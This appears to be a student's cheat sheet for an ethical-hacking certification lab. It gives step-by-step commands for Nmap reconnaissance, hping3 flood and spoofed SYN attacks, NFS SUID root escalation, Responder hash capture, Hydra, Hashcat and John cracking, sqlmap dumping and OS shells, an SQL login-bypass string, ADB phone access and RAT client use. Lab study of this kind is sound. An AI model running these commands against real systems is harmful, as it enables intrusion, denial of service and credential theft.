๐งชLabs and Training
Tools Used da Technology Hacks
Linux ๐ง
Netdiscover, Nmap, Hydra, John the ripper, Wpscan, Sqlmap, ADB, Hashcat PhoneSploit Metasploit.
Windows ๐ช
Wireshark, Hashcalc, Veracrypt, BCTextEncoder, Cryptool, Snow, OpenStego.
Notes/Exercises
Nmap
Identify all active hosts in a network
nmap -sP <target_IP>/Subnet
Do a Stelth Scan, Invading firewall, IDS/IPS
nmap -sS -p 80, 443 <target_IP>/Subnet
Identify the OS of the machine hosting a DB
To check target with open DB port (3306 or 1433): nmap -sV IP/subnet
or nmap -A IP/subnet
or nmap -p3306,1433 IP/subnet
and check relative info about OS.
Locate IP address of the machine with RDP open port
nmap -Pn -p -sV 3389 <target_IP>
prim
Find FQDN of domain controller
FQDN (FQDN = Hostname + Domain) an example can be: mail.example.com mail (hostname), example.com (domain).
Scan subnet or target filtering for LDAP port (389):
nmap -p389 -sV -iL <target_list>
-> if we've more targets IP
or
nmap -p389 -sV <target_IP>
or
nmap -p 389 --script ldap-rootdse <target_IP>
If LDAP port is filtered or closed, we should try to scan host using following parameters:
nmap -Pn -A <target_IP>
In alternative we can find following ports opened: 88 (Kerberos), 636 (LDAPS), 3268 (LDAP Global).
Running nmap command we'll retrieve info about Domain and Host name:
Domain: pentester.team Service Info: Host: DC;
then FQDN = DC.pentester.team
Identify the number of hosts that are alive
to checks hosts up: nmap -sn IP/Subnet
Identify potential vulnerabilities of services
nmap -Pn --script vuln <target_IP>
Perform vertical privilege escalation of a root user, and enter the flag
Exploiting misconfigured NFS (port 2049)
nmap -sV โp 2049 IP/Subnet
sudo apt-get install nfs-common
nmap -sV โscript=nfs-showmount <Target_IP>
check available mounts:
showmount -e <Target_IP>
-> we will see /home directorymkdir /tmp/nfs
sudo mount -t nfs 10.10.1.9:/home /tmp/nfs
cd /tmp/nfs
sudo cp /bin/bash .
sudo chmod +s bash
-> it will be highlighted in redls -la
sudo df -h
sudo chmod +s bash
after them, In another terminal:
Access to target using SSH
./bash -p
and we're root!cd /home
ls -la
Find the flag:
find / -name "*.txt" -ls 2> /dev/null
WireShark
Which machine started DOS attack? DDOS attack happened on which IP? Find out http crediantls from PCAP file?
To find DOS (SYN and ACK) :
statistic -> IPv4 statistics -> source and destination address
filter using:
tcp.flags.syn == 1
ortcp.flags.syn == 1 and tcp.flags.ack == 0
or filter to highest number of request
Analyze the pcap file and determine the number of machines that were involved in DDOS attack
statistic -> IPv4 statistic -> source and destination address
Or
View Flood attack on victim via Wireshark | use filter tcp.port=21
Or
Find the dos attacker ip using Wireshark
Statistic -> conversion
identified ip , which has flooding server with SYN request.
Or
get the statistics of ipv4 -> we can see that Packets B -> A are null, because the're not reply pack.
To find passwords :
http.request.method == POST
To find DOS -> Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port if need.
SYN DDOS Attack using Hping
hping3 -S 1.1.1.6 -a 1.1.1.3 -p 22 --flood
1.1.1.6 is target IP
1.1.1.3 is the spoof IP
22 is port number.
POD - Ping of Death Attack
hping3 -d 65538 -S -p 21 --flood 1.1.1.6
-d is data size
-S is syn packets
-p is port (you can flood any app with open ports.
UDP Flood attack
hping3 -2 -p 139 --flood 1.1.1.6
-2 is for UDP
-p is port
Identify IoT Message and its Length using capture.cap
Filter .cap file on wireshark with 'MQTT' filter
Select packet related to Publish Message
Click on MQ Telemetry Transport Protocol -> Header Flags -> Message Msg Len
or
Click on MQ Telemetry Transport Protocol -> Publish Message -> Msg Len
BCTextEncoder
Decrypt the encoded secret and enter the decrpted text as the answer
Use BCTextEncoder to decrypt the encoded secret file, psw can be the same of SMB login
๐BCTextEncoderLLMNR Poisoning NTML Hash cracking
Responder: responder -I eth0 -rdwv
Copy the hash from responder to ntlmhash.txt
and crack it using Hashcat or John
Hashcat
hashcat -m 0 -a 0 hash.txt passwordlist.txt -m 0
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt
MD5 hash mode -a 0:
Dictionary attack mode hash.txt txt file containing hash in a compliant format passwordlist.txt: dictionary file containing passwords in plain text
John the Ripper
john โformat-raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john /usr/share/responder/logs/SMB-NTLMv2-SSP-1.1.15.txt
Hydra
Crack the FTP credentials to obtain file stored into FTP server an enter the content as the answer
Find IP with FTP open port: nmap -p 21 IP/Subnet
if we know username:
hydra -l user -P passlist.txt ftp://IP
if we don't know username and psw:
hydra -L /user.txt -P password.txt ftp://IP
orhydra -L /home/attacker/Desktop/CEH_TOOLS/Wordlists/Username.txt -P /home/attacker/Desktop/CEH_TOOLS/Wordlists/Password.txt ftp://IP
Login using FTP credentials obtained, get flag and cat it.
Crack the SMB credentials knowing username to obtain file stored into share
Brute force smb login
Download file stored into share
Entropy
Perform deep scan on the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value locate into android folder
Scan adb port:
nmap ip -sV -p 5555
Connect adb:
adb connect IP:5555
Access mobile device:
adb shell
Elevate privilege using:
sudo -i
(if it is possile)pwd
-->ls
-->cd sdcard/Notifications/Scan
-->ls
-->cat secret.txt
(If you can't find, check in others folders)Download files:
adb pull /sdcard/Notifications/Scan
Do it in another shell, without adb connection!We've three elf files, now we need to calcolate entropy for each of them using this command:
ent file.elf
After selecting file.elf with highest entropy, we need to calculate hash of SHA 384:
sha384sum file.elf
and consider only the last 4 digits of the hash result.
FTP
To download resources from FTP service we can use following commands:
GoBuster
SQLMap
Finding vulnerable site
site:http://testphp.vulnweb.com/ php?=
(for cookies- console->document.cookie)
Have cookie value is better, because reduce time to elaborate results!
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
--dbs (databases)
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
-D acuart โtables (tables)
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
-D acuart -T users --columns (columns)
Dump whole table
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
-D acuart -T users --dump
OR
(dump individual column data)
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
-D acuart -T users -C uname --dump
sqlmap -u
http://testphp.vulnweb.com/artists.php?artist=1
-D acuart -T users -C pass --dump
sqlmap -u "http://vmw.moviescope.com/viewprofile.aspx?id=l" โdbs [ Copy the cookie from website, mysql -U qdpmadmin -h 192.168.1.8 -P passwod [ If you have logins credentioals I
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" --dbs
Get list of tables ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" -D mysql --tables
Dump data from tables ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" -D mysql -T db --dump
Get OS shell ->
sqlmap -u "http://1.1.1.3/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=d6f94e8c6e291cc8770da9561cea6811" --os-shell
Perform an SQL injection attack on web application and retrieve psw of user Mario (you just know these credentials maria:ferrari10)
If we just know crediantials (how our case) login, otherwise we need to bypass login putting into username box:
user' OR 1=1 --
and into psw a random textClick on view profile (../viewprofile.aspx?id=1). There, we can use IDOR vulnerability (manipulating =id value) and seeing info regarding another user. In alternative we can use SQLMap to dump user info.
Snow
snow.exe -C -p โpasswordโ stegfile.txt
OpenStego
Analyze the image file and extract the sensitive data hidden in the file
Download OpenStego for Windows OS -> https://github.com/syvaidya/openstego/releases/download/openstego-0.8.6/Setup-OpenStego-0.8.6.exe
Run OpenStego
Select Extract Data
Upload file and select path of destination
Insert how psw a potential keyword present into question
Click to Extract Data
CrypTool
Can you decrypt the file and provide the contents of "flag1.txt" as the answer?
Connect to ftp using cmd:
ftp IP
After connect with FTP go to the file and download them using get or mget commands:
get file.txt
get file1.txt
Decrypt file: open CrypTool program -> Encrypt/Decrypt -> Symmetric (modern) -> DES (ECB)
WPSCAN
Identify psw associated with the User ID "sarah" and resolve the issue to allow her to access her account again.
wpscan --url http://192.168.1.10:8080/CEH -u sarah -P passwdlist.txt
or
Hashes.com
Decrypt/Crack the MD5 hash present into a website
A file called "Secrethash.txt" has been uploaded via DVWA at http://192.168.1.10:8080/DVWA. The file is located at the following path: C:\wamp64\www\DVWA\hackable\uploads\Secret-Hash.txt. Your task is to crack the MD5 hash present in the file and reveal the original message. You can access the file by logging into DVWA using the provided credentials: superuser::superman.
Got to the site, login, go to the url uploads/Secret-hash.txt
Decrypt file using this web tool: https://hashes.com/en/decrypt/hash
RDP
Connect to RDP port
Find secret number hidden inside the file located in a directory (accessible using RDP)
A file named "Secret.txt" that has been concealed within the Server 2019 machine is located at the following path: C:\Users\Dell\Documents\Confidential.
You will need to use a backdoor installed in the server to access the file. (it's a fake news)
Your objective is to find the secret number hidden inside the file and provide it as your answer.
User credentials of RDP you find in the previous answer (of rdp) to login.
Browse to the mentioned path C:\Users\Dell\Documents\Confidential
Open "Secret.txt" file and copy the number inside.
Find suspicious account? You've a credential of one user, you can use RDP to log in e found suspicious account (port 3389).
Opening cmd and use:
net user
command.
Check phone number of Maria
A site has SQLi vulnerability, the cookie information is stored in a text file in the Documents folder of the EH-2 machine. Use the SQL DSSS attack method to capture the session link. Determine the contact number of Maria associated twith a website.
We bypass auth, then use IDOR to find Maria's number
Netbios
If you get any questions related to netbios, SMB use metasploit.
SMB
Nmap
SMBMap
SMB - Hydra
SMB - Metasploit
SMB Connection
Malware Analysis
Identify malware entry point address
PEiD (suggested)
Download PEiF tool -> https://softfamous.com/peid/
Execute PEiD tool
Upload malware executable
See entry point address
PEView
Download PEView tool
Execute tool
Upload malware executable
Look for the "Optional Header" section within the PEView interface. In this section, you should find the "AddressOfEntryPoint" field, which represents the entry point of the executable. Note the hexadecimal value displayed in the "AddressOfEntryPoint" field. This is the entry point address of the executable.
Detect it easy
Execute Detect it easy client tool
Upload malware executable
Click to File info
See entry point address
or we can use: PE Explorer tools
Retrieve file connecting to RAT installed into victim machine
Theef default port: 9871, 6703, FTP 2968
NJRAT default port: 5552
MoSucker default port: 200005
ProRat default port: 5110
ProRat
Execute ProRat
Set victim IP and relative port 5110
Click to connect and search files.
Theef
Execute Theef
Set victim IP and relative ports to 6703 and 2968 (or custom port)
Click to connect and open file manger.
NjRat
Execute NjRat
Insert IP and Port
Click on manager and open directory
Aircrack-ng
Crack the wireless encryption and identify the Wi-Fi password
1st tentative: aircrack-ng pcapfile
(usually works only for WEP encryption)
2nd tentative: aircrack-ng -w passwordlist pcapfile
3rd tentative: adding BSSID (-b flag): aircrack-ng -b BSSID -w passwordlist pcapfile
(To find BSSID: on Wireshark click on packet, search BSSID and copy value)
Veracrypt
Access the Veracrypt volume, and find the secret code
Decrypt password needed to access to volume
Access to encrypted Drive (C:) using password decrypted into Veracrypt
Find secret code file stored into C Drive.
Download file from FTP
wget -m ftp://anonymous:anonymous@<ip>
wget -m --no-passive ftp://anonymous:anonymous@<ip>
Basic Windows cmd ๐ช
net user -> For Domain Users Enumeration
type C:\path.txt -> It displays the content of the path.txt file.
dir
cd
hostname
whoami
pwd
Basic Linux cmd ๐ง
ls - view contents of directory (list)
pwd - path of the current directory
cd - change directoryn
mkdir - make new directory
mv - move files / rename files
cp - copy files
rm - remove files
touch - create blank new file
rmdir - delete directory
cat - list content of file to terminal
clear - clear terminal window
echo - move data into a file
less - Read text file one screen at a time
man - show manual of Linux commands
sudo - enables you to perform tasks that require administrative or root permissions
top - task manager in terminal
tar - used to archive multiple files into a tarball
grep - used to searching words in specific files
head - view first lines of any text file
tail - view last lines of any text file
diff - compares the contents of two files line by line
kill - used for killing unresponsive program
jobs - display all current jobs along with their statuses
sort - is a command line utility for sorting lines of text files
df - info about system disk
du - check how much space a file or directory takes
zip - to compress your files into a zip archive
unzip - to extract the zipped files from a zip archive
ssh - a secure encrypted connection between two hosts over and insecure network
cal - shows calendar
apt - command line tool for interaction with packaging system
alias - custom shortcuts used to represent a command
w - current user info
whereis - used to locate the binary, source, manual page files
whatis - used to get one-line man page description
useradd - used to create a new user
passwd - used to changing password of current user
whoami - print current user
uptime - print current time when machine starts
free - print free disk space info
history - print used commands history
uname - print detailed information about your Linux system
ping - to check connectivity status to a server
chmod - to change permissions of files and directories
chown - to change ownership of files and directories
find - using find searches for files and directories
locate - used to locate a file, just like the search command in Windows
ifconfig - print ip address stuff
ip a - similar to ifconfig but shortest print
finger - gives you a short dump of info about a user
Find command
Searching the target system for important information and potential privilege escalation vectors can be fruitful. The built-in โfindโ command is useful and worth keeping in your arsenal.
Below are some useful examples for the โfindโ command.
Find files:
find / -type f -iname "flag1.txt" 2>/dev/null
: find the file named "flag1.txt" case insensitive under / and not showing output errorsfind . -name flag1.txt
: find the file named โflag1.txtโ in the current directoryfind /home -name flag1.txt
: find the file names โflag1.txtโ in the /home directoryfind / -type d -name config
: find the directory named config under โ/โfind / -type f -perm 0777
: find files with the 777 permissions (files readable, writable, and executable by all users)find / -perm a=x
: find executable filesfind /home -user frank
: find all files for user โfrankโ under โ/homeโfind / -mtime 10
: find files that were modified in the last 10 daysfind / -atime 10
: find files that were accessed in the last 10 dayfind / -cmin -60
: find files changed within the last hour (60 minutes)find / -amin -60
: find files accesses within the last hour (60 minutes)find / -size 50M
: find files with a 50 MB size
This command can also be used with (+) and (-) signs to specify a file that is larger or smaller than the given size.
The example above returns files that are larger than 100 MB. It is important to note that the โfindโ command tends to generate errors which sometimes makes the output hard to read. This is why it would be wise to use the โfindโ command with โ-type f 2>/dev/nullโ to redirect errors to โ/dev/nullโ and have a cleaner output.
Folders and files that can be written to or executed from:
find / -writable -type d 2>/dev/null
: Find world-writeable foldersfind / -perm -222 -type d 2>/dev/null
: Find world-writeable foldersfind / -perm -o w -type d 2>/dev/null
: Find world-writeable folders
The reason we see three different โfindโ commands that could potentially lead to the same result can be seen in the manual document. As you can see below, the perm parameter affects the way โfindโ works.
find / -perm -o x -type d 2>/dev/null
: Find world-executable folders
Find development tools and supported languages:
find / -name perl*
find / -name python*
find / -name gcc*
Find specific file permissions:
Below is a short example used to find files that have the SUID bit set. The SUID bit allows the file to run with the privilege level of the account that owns it, rather than the account which runs it.
This allows for an interesting privilege escalation path,we will see in more details on task 6.
The example below is given to complete the subject on the โfindโ command.
find / -perm -u=s -type f 2>/dev/null
: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.
Alternative in Windows OS
Others resources
Last updated